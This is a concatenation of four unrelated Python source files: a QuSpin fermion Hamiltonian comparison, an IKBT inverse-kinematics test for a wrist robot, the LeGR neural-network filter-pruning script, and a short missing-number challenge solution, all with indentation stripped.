#
###### construct user_basis
# define anti-commuting bits -- fermion signs on the integer bits (not sites!) that represent a fermion degree of freedom
noncommuting_bits = [(np.arange(N),-1)] # fermion signs are counted w.r.t. the shift operator <<
# define maps dict
maps = dict(T_block=(translation,N,0,T_args), P_block=(parity,2,0,P_args), )
#maps = dict(P_block=(parity,2,0,P_args), )
#maps = dict(T_block=(translation,N,0,T_args) )
op_dict = dict(op=op,op_args=op_args)
# create user basis
basis = user_basis(np.uint32,N,op_dict,allowed_ops=set("xy+-nI"),sps=2,noncommuting_bits=noncommuting_bits,**maps)
#
#
print(basis)
#
############ create and compare Hamiltonians #############
#
##### Hamiltonian in using Majoranas
#
J=-np.sqrt(2.0) # hoppping
U=+1.0 # nn interaction
#
hop_term_p=[[+0.5j*J,j,(j+1)%N] for j in range(N)]
hop_term_m=[[-0.5j*J,j,(j+1)%N] for j in range(N)]
density_term=[[+0.5j*U,j,j] for j in range(N)]
int_term=[[-0.25*U,j,j,(j+1)%N,(j+1)%N] for j in range(N)]
id_term=[[0.25*U,j] for j in range(N)]
#
static=[['xy',hop_term_p],['yx',hop_term_m], # kinetic energy
['I',id_term],['xy',density_term],['xyxy',int_term], # nn interaction energy
]
dynamic=[]
#
no_checks=dict(check_symm=False, check_pcon=False, check_herm=False)
H_majorana=hamiltonian(static,[],basis=basis,dtype=np.float64,**no_checks)
#
#
##### Hamiltonian using complex fermions
#
#
hopping_pm=[[+J,j,(j+1)%N] for j in range(N)]
hopping_mp=[[-J,j,(j+1)%N] for j in range(N)]
nn_int=[[U,j,(j+1)%N] for j in range(N)]
#
static=[["+-",hopping_pm],["-+",hopping_mp],["nn",nn_int]]
dynamic=[]
#
no_checks=dict(check_symm=False, check_pcon=False, check_herm=False)
H=hamiltonian(static,[],basis=basis,dtype=np.float64,**no_checks)
print(H.toarray())
print()
print(H_majorana.toarray())
print()
print(np.linalg.norm((H-H_majorana).toarray())) |
tests/Wrist_IK_loop_test.py | mdecourse/IKBT | 129 | 12653868 | <reponame>mdecourse/IKBT
#!/usr/bin/python
# Python inverse kinematic equations for Wrist
# This test performs the following:
#
# 1) Generate a reachable 4x4 pose
# 2) run the generated IK Python code for "Wrist" robot
# 3) take resulting list of joint-solutions and put them back into
# forward kinematics
# 4) compare the generated 4x4 matrices to the original pose
#
# Running instructions:
#
# > cd IKBT/
# > python -m tests.Wrist_IK_loop_test
#
# final results for each solution are error -- should be very small
#
#
import numpy as np
from math import sqrt
from math import atan2
from math import cos
from math import sin
from ikbtbasics.pykinsym import *
from ikbtfunctions.helperfunctions import *
from ikbtbasics.kin_cl import *
from ikbtbasics.ik_classes import * # special classes for Inverse kinematics in sympy
from ikbtfunctions.ik_robots import *
pi = np.pi
# Declare the parameters
# Code to solve the unknowns
def ikin_Wrist(T):
if(T.shape != (4,4)):
        print("bad input to ikin_Wrist")
quit()
#define the input vars
r_11 = T[0,0]
r_12 = T[0,1]
r_13 = T[0,2]
r_21 = T[1,0]
r_22 = T[1,1]
r_23 = T[1,2]
r_31 = T[2,0]
r_32 = T[2,1]
r_33 = T[2,2]
Px = T[0,3]
Py = T[1,3]
Pz = T[2,3]
#
# Caution: Generated code is not yet validated
#
solvable_pose = True
#Variable: A
As1 = atan2(r_21, r_11)
As2 = atan2(-r_21, -r_11)
#Variable: B
Bs2 = atan2(-r_31, r_11/cos(As2))
Bs1 = atan2(-r_31, r_11/cos(As1))
#Variable: C
Cs2 = atan2(r_32/cos(Bs1), r_33/cos(Bs1))
Cs1 = atan2(r_32/cos(Bs2), r_33/cos(Bs2))
##################################
#
#package the solutions into a list for each set
#
###################################
solution_list = []
    # (note: trailing commas are allowed in Python)
solution_list.append( [ As1, Bs1, Cs2, ] )
    # (note: trailing commas are allowed in Python)
solution_list.append( [ As2, Bs2, Cs1, ] )
if(solvable_pose):
return(solution_list)
else:
return(False)
#
# TEST CODE
#
if __name__ == "__main__":
# 4x4 transforms which are pure rotations
def RotX4_N(t):
return(np.matrix([
[1, 0, 0, 0],
[0, np.cos(t), -np.sin(t), 0],
[0, np.sin(t), np.cos(t), 0],
[0,0,0,1.0]
]))
def RotY4_N(t):
return(np.matrix([
[ np.cos(t), 0, np.sin(t), 0],
[0, 1, 0 , 0],
[-np.sin(t), 0, np.cos(t), 0],
[0,0,0,1]
]))
def RotZ4_N(t):
return(np.matrix([
[ np.cos(t), -np.sin(t), 0, 0],
[ np.sin(t), np.cos(t), 0, 0],
[ 0, 0, 1, 0],
[0,0,0,1]
]))
px = 0.2 # desired EE position
py = 0.3
pz = 0.6
th = np.pi/7 # just a random angle
# generate a 4x4 pose to test IK
T1 = RotX4_N(th) * RotY4_N(2*th) # combine two rotations
T1[0,3] = px
T1[1,3] = py
T1[2,3] = pz
    # try the Wrist IK
sol_list = ikin_Wrist(T1)
i = 0
for sol in sol_list:
print('')
print('Solution ', i)
i+=1
print(sol)
    ######### try to plug the solutions back into the FK model
robot = 'Wrist'
# Get the robot model
[dh, vv, params, pvals, unknowns] = robot_params(robot) # see ik_robots.py
#
# Set up robot equations for further solution by BT
#
# Check for a pickle file of pre-computed Mech object. If the pickle
# file is not there, compute the kinematic equations
testing = False
[M, R, unknowns] = kinematics_pickle(robot, dh, params, pvals, vv, unknowns, testing)
print('GOT HERE: robot name: ', R.name)
R.name = robot
R.params = params
## check the pickle in case DH params were changed
dhp = M.DH
check_the_pickle(dhp, dh) # check that two mechanisms have identical DH params
sp.var('A B C')
i=0
# for each solution, compare FK(sol) with T01
for sol in sol_list:
pose = {A : sol[0], B : sol[1], C : sol[2]}
T2 = forward_kinematics_N(M, pose, M.pvals)
maxe = -9999999.99
print('- - - - - ')
print(T2-T1)
print('- - - - - ')
for k in [0,1,2,3]:
for j in [0,1,2]:
e = T1[k,j]-T2[k,j]
#print '<<',e,'>>'
if np.abs(e) > maxe:
maxe = np.abs(e)
print('Solution ',i,': ', maxe)
i += 1
|
legr.py | cmu-enyac/LeGR | 106 | 12653875 | import os
import time
import torch
import queue
import argparse
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from utils.drivers import train, test, get_dataloader
from model.MobileNetV2 import MobileNetV2, InvertedResidual
from pruner.fp_mbnetv2 import FilterPrunerMBNetV2
from pruner.fp_resnet import FilterPrunerResNet
class LeGR:
def __init__(self, dataset, datapath, model, pruner, rank_type='l2_weight', batch_size=32, lr=1e-3, safeguard=0, global_random_rank=False, lub='', device='cuda'):
self.device = device
self.sample_for_ranking = 1 if rank_type in ['l1_weight', 'l2_weight', 'l2_bn', 'l1_bn', 'l2_bn_param'] else 5000
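        # weight/BN-norm criteria can be ranked from the parameters alone, so a single
        # forward pass suffices; data-driven criteria use 5000 samples.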
self.safeguard = safeguard
self.lub = lub
self.lr = lr
        self.img_size = 32 if 'CIFAR' in dataset else 224
self.batch_size = batch_size
self.rank_type = rank_type
self.train_loader, self.val_loader, self.test_loader = get_dataloader(self.img_size, dataset, datapath, batch_size, args.no_val)
if 'CIFAR100' in dataset:
num_classes = 100
elif 'CIFAR10' in dataset:
num_classes = 10
elif 'ImageNet' in dataset:
num_classes = 1000
elif 'CUB200' in dataset:
num_classes = 200
self.model = model
self.criterion = torch.nn.CrossEntropyLoss()
self.pruner = eval(pruner)(self.model, rank_type, num_classes, safeguard, random=global_random_rank, device=device)
self.model.train()
def learn_ranking_ea(self, name, model_desc, tau_hat, long_ft, target):
name = name
start_t = time.time()
self.pruner.reset()
self.pruner.model.eval()
self.pruner.forward(torch.zeros((1,3,self.img_size,self.img_size), device=self.device))
original_flops = self.pruner.cur_flops
original_size = self.pruner.cur_size
print('Before Pruning, FLOPs: {:.3f}M, Size: {:.3f}M'.format(original_flops/1e6, original_size/1e6))
mean_loss = []
num_layers = len(self.pruner.filter_ranks)
minimum_loss = 10
best_perturbation = None
POPULATIONS = 64
SAMPLES = 16
GENERATIONS = 400
SCALE_SIGMA = 1
MUTATE_PERCENT = 0.1
index_queue = queue.Queue(POPULATIONS)
population_loss = np.zeros(0)
population_data = []
original_dist = self.pruner.filter_ranks.copy()
original_dist_stat = {}
for k in sorted(original_dist):
a = original_dist[k].cpu().numpy()
original_dist_stat[k] = {'mean': np.mean(a), 'std': np.std(a)}
# Initialize Population
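        # Regularized-evolution loop: the first POPULATIONS iterations seed the population
        # with random per-layer affine transforms (plus the identity), after which each
        # generation samples SAMPLES candidates, mutates the tournament winner, and
        # replaces the oldest member.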
for i in range(GENERATIONS):
step_size = 1-(float(i)/(GENERATIONS*1.25))
            # Perturb distribution
perturbation = []
if i == POPULATIONS-1:
for k in sorted(self.pruner.filter_ranks.keys()):
perturbation.append((1,0))
elif i < POPULATIONS-1:
for k in sorted(self.pruner.filter_ranks.keys()):
scale = np.exp(float(np.random.normal(0, SCALE_SIGMA)))
shift = float(np.random.normal(0, original_dist_stat[k]['std']))
perturbation.append((scale, shift))
else:
mean_loss.append(np.mean(population_loss))
sampled_idx = np.random.choice(POPULATIONS, SAMPLES)
sampled_loss = population_loss[sampled_idx]
winner_idx_ = np.argmin(sampled_loss)
winner_idx = sampled_idx[winner_idx_]
oldest_index = index_queue.get()
# Mutate winner
base = population_data[winner_idx]
# Perturb distribution
mnum = int(MUTATE_PERCENT * len(self.pruner.filter_ranks))
mutate_candidate = np.random.choice(len(self.pruner.filter_ranks), mnum)
for k in sorted(self.pruner.filter_ranks.keys()):
scale = 1
shift = 0
if k in mutate_candidate:
scale = np.exp(float(np.random.normal(0, SCALE_SIGMA*step_size)))
shift = float(np.random.normal(0, original_dist_stat[k]['std']))
perturbation.append((scale*base[k][0], shift+base[k][1]))
# Given affine transformations, rank and prune
self.pruner.pruning_with_transformations(original_dist, perturbation, target)
# Re-measure the pruned model in terms of FLOPs and size
self.pruner.reset()
self.pruner.model.eval()
self.pruner.forward(torch.zeros((1,3,self.img_size,self.img_size), device=self.device))
cur_flops = self.pruner.cur_flops
cur_size = self.pruner.cur_size
self.pruner.model = self.pruner.model.to(self.device)
print('Density: {:.3f}% ({:.3f}M/{:.3f}M) | FLOPs: {:.3f}% ({:.3f}M/{:.3f}M)'.format(float(cur_size)/original_size*100, cur_size/1e6, original_size/1e6,
float(cur_flops)/original_flops*100, cur_flops/1e6, original_flops/1e6))
print('Fine tuning to recover from pruning iteration.')
optimizer = optim.SGD(self.pruner.model.parameters(), lr=self.lr, momentum=0.9, weight_decay=5e-4)
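            # short fine-tune (tau_hat updates) before measuring validation loss as the EA fitness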
if tau_hat > 0:
train(self.model, self.train_loader, self.val_loader, optimizer, epochs=1, steps=tau_hat, run_test=False, device=self.device)
acc, loss = test(self.model, self.val_loader, device=self.device, get_loss=True)
if np.mean(loss) < minimum_loss:
minimum_loss = np.mean(loss)
best_perturbation = perturbation
if i < POPULATIONS:
index_queue.put(i)
population_data.append(perturbation)
population_loss = np.append(population_loss, [np.mean(loss)])
else:
index_queue.put(oldest_index)
population_data[oldest_index] = perturbation
population_loss[oldest_index] = np.mean(loss)
# Restore the model back to origin
model = torch.load(model_desc)
if isinstance(model, nn.DataParallel):
model = model.module
model.eval()
model = model.to(self.device)
self.pruner.model = model
self.model = model
self.pruner.reset()
self.pruner.model.eval()
self.pruner.forward(torch.zeros((1,3,self.img_size,self.img_size), device=self.device))
print('Generation {}, Step: {:.2f}, Min Loss: {:.3f}'.format(i, step_size, np.min(population_loss)))
total_t = time.time() - start_t
print('Finished. Use {:.2f} hours. Minimum Loss: {:.3f}'.format(float(total_t) / 3600, minimum_loss))
if not os.path.exists('./log'):
os.makedirs('./log')
np.savetxt(os.path.join('./log', '{}_ea_loss.txt'.format(name)), np.array(mean_loss))
np.savetxt(os.path.join('./log', '{}_ea_min.data'.format(name)), best_perturbation)
# Use the best affine transformation to obtain the resulting model
self.pruner.pruning_with_transformations(original_dist, best_perturbation, target)
if not os.path.exists('./ckpt'):
os.makedirs('./ckpt')
torch.save(self.pruner.model, os.path.join('ckpt', '{}_bestarch_init.pt'.format(name)))
def prune(self, name, model_name, long_ft, target=-1):
test_acc = []
b4ft_test_acc = []
density = []
flops = []
# Get the accuracy before pruning
acc = test(self.model, self.test_loader, device=self.device)
test_acc.append(acc)
b4ft_test_acc.append(acc)
self.pruner.reset()
self.model.eval()
self.pruner.forward(torch.zeros((1,3,self.img_size,self.img_size), device=self.device))
b4prune_size = self.pruner.cur_size
b4prune_flops = self.pruner.cur_flops
density.append(self.pruner.cur_size)
flops.append(self.pruner.cur_flops)
print('Before Pruning, Acc: {:.2f}%, FLOPs: {:.3f}M, Size: {:.3f}M'.format(acc, b4prune_flops/1e6, b4prune_size/1e6))
# If there is learned affine transformation, load it.
if self.lub != '':
perturbation = np.loadtxt(self.lub)
else:
perturbation = np.array([[1., 0.] for _ in range(len(self.pruner.filter_ranks))])
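        # with the identity transform (scale 1, shift 0) for every layer, this reduces to
        # plain pruning by the chosen rank_type.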
self.pruner.pruning_with_transformations(self.pruner.filter_ranks, perturbation, target)
self.pruner.reset()
self.model.eval()
self.pruner.forward(torch.zeros((1,3,self.img_size,self.img_size), device=self.device))
cur_flops = self.pruner.cur_flops
cur_size = self.pruner.cur_size
density.append(cur_size)
flops.append(cur_flops)
print('Density: {:.3f}% ({:.3f}M/{:.3f}M) | FLOPs: {:.3f}% ({:.3f}M/{:.3f}M)'.format(cur_size/b4prune_size*100, cur_size/1e6, b4prune_size/1e6,
cur_flops/b4prune_flops*100, cur_flops/1e6, b4prune_flops/1e6))
print('Fine tuning to recover from pruning iteration.')
if not os.path.exists('./ckpt'):
os.makedirs('./ckpt')
print('Saving untrained pruned model...')
torch.save(self.pruner.model, os.path.join('ckpt', '{}_init.t7'.format(name)))
acc = test(self.model, self.test_loader, device=self.device)
b4ft_test_acc.append(acc)
if not os.path.exists('./log'):
os.makedirs('./log')
print('Finished. Going to fine tune the model a bit more')
if long_ft > 0:
optimizer = optim.SGD(self.model.parameters(), lr=self.lr, momentum=0.9, weight_decay=5e-4, nesterov=True)
#scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, long_ft)
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, [int(long_ft*0.3), int(long_ft*0.6), int(long_ft*0.8)], gamma=0.2)
if args.no_val:
train(self.model, self.train_loader, self.test_loader, optimizer, epochs=long_ft, scheduler=scheduler, device=self.device, name=name)
else:
train(self.model, self.train_loader, self.val_loader, optimizer, epochs=long_ft, scheduler=scheduler, device=self.device, name=name)
acc = test(self.model, self.test_loader, device=self.device)
test_acc.append(acc)
else:
acc = test(self.model, self.test_loader, device=self.device)
test_acc.append(acc)
log = np.stack([np.array(b4ft_test_acc), np.array(test_acc), np.array(density), np.array(flops)], axis=1)
np.savetxt(os.path.join('./log', '{}_test_acc.txt'.format(name)), log)
print('Summary')
print('Before Pruning- Accuracy: {:.3f}, Cost: {:.3f}M'.format(test_acc[0], b4prune_flops/1e6))
print('After Pruning- Accuracy: {:.3f}, Cost: {:.3f}M'.format(test_acc[-1], cur_flops/1e6))
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("--name", type=str, default='pruned_mbnetv2', help='Name for the experiments, the resulting model and logs will use this')
parser.add_argument("--datapath", type=str, default='./data', help='Path toward the dataset that is used for this experiment')
parser.add_argument("--dataset", type=str, default='torchvision.datasets.CIFAR10', help='The class name of the dataset that is used, please find available classes under the dataset folder')
parser.add_argument("--model", type=str, default='./ckpt/resnet56_cifar10.t7', help='The pre-trained model that pruning starts from')
parser.add_argument("--pruner", type=str, default='FilterPrunerResNet', help='Different network require differnt pruner implementation')
parser.add_argument("--rank_type", type=str, default='l2_weight', help='The ranking criteria for filter pruning')
parser.add_argument("--lub", type=str, default='', help='The affine transformations')
parser.add_argument("--global_random_rank", action='store_true', default=False, help='When this is specified, none of the rank_type matters, it will randomly prune the filters')
parser.add_argument("--tau_hat", type=int, default=0, help='The number of updates before evaluating for fitness (used in EA).')
parser.add_argument("--long_ft", type=int, default=60, help='It specifies how many epochs to fine-tune the network once the pruning is done')
parser.add_argument("--prune_away", type=float, default=90, help='How many percentage of constraints should be pruned away. E.g., 50 means 50% of FLOPs will be pruned away')
parser.add_argument("--safeguard", type=float, default=0, help='A floating point number that represent at least how many percentage of the original number of channel should be preserved. E.g., 0.10 means no matter what ranking, each layer should have at least 10% of the number of original channels.')
parser.add_argument("--batch_size", type=int, default=32, help='Batch size for training.')
parser.add_argument("--min_lub", action='store_true', default=False, help='Use Evolutionary Algorithm to solve latent variable for minimizing Lipschitz upper bound')
parser.add_argument("--uniform_pruning", action='store_true', default=False, help='Use Evolutionary Algorithm to solve latent variable for minimizing Lipschitz upper bound')
parser.add_argument("--no_val", action='store_true', default=False, help='Use full dataset to train (use to compare with prior art in CIFAR-10)')
parser.add_argument("--cpu", action='store_true', default=False, help='Use CPU')
parser.add_argument("--lr", type=float, default=0.001, help='The learning rate for fine-tuning')
args = parser.parse_args()
return args
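# Example invocation (illustrative; adjust names, paths and targets to your setup):
#   python legr.py --name legr_resnet56 --dataset torchvision.datasets.CIFAR10 \
#       --datapath ./data --model ./ckpt/resnet56_cifar10.t7 \
#       --pruner FilterPrunerResNet --prune_away 50 --long_ft 60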
if __name__ == '__main__':
args = get_args()
print(args)
print('Pruning {}'.format(args.name))
img_size = 32
device = 'cpu' if args.cpu else 'cuda'
prune_till = -1
prune_away = args.prune_away
model = torch.load(args.model)
if isinstance(model, nn.DataParallel):
model = model.module
model = model.to(device)
legr = LeGR(args.dataset, args.datapath, model, args.pruner, args.rank_type, args.batch_size, args.lr, safeguard=args.safeguard, global_random_rank=args.global_random_rank, lub=args.lub, device=device)
if prune_away > 0:
dummy_size = 32 if 'CIFAR' in args.dataset else 224
legr.pruner.reset()
legr.model.eval()
legr.pruner.forward(torch.zeros((1,3,dummy_size, dummy_size), device=device))
b4prune_flops = legr.pruner.cur_flops
prune_till = b4prune_flops * (1-(prune_away)/100.)
        print('Pruning down to {:.3f}M FLOPs'.format(prune_till/1000000.))
if args.uniform_pruning:
ratio = legr.pruner.get_uniform_ratio(prune_till)
legr.pruner.safeguard = ratio
prune_away = 99
if args.min_lub:
legr.learn_ranking_ea(args.name, args.model, args.tau_hat, args.long_ft, (1-(prune_away)/100.))
else:
legr.prune(args.name, args.model, args.long_ft, (1-(prune_away)/100.))
|
challenge_7/python/wost/find_missing_number.py | rchicoli/2017-challenges | 271 | 12653880 | <filename>challenge_7/python/wost/find_missing_number.py
def find_missing_number(c):
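    # Compares the values in c against the full integer range from the minimum (treated
    # as 0 when the list starts at 1) up to the maximum, and returns a missing value,
    # or None if nothing is missing.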
b = max(c)
d = min(c + [0]) if min(c) == 1 else min(c)
v = set(range(d, b)) - set(c)
return list(v)[0] if v != set() else None
print(find_missing_number([1, 3, 2, 4]))
print(find_missing_number([0, 2, 3, 4, 5]))
print(find_missing_number([9, 7, 5, 8]))
|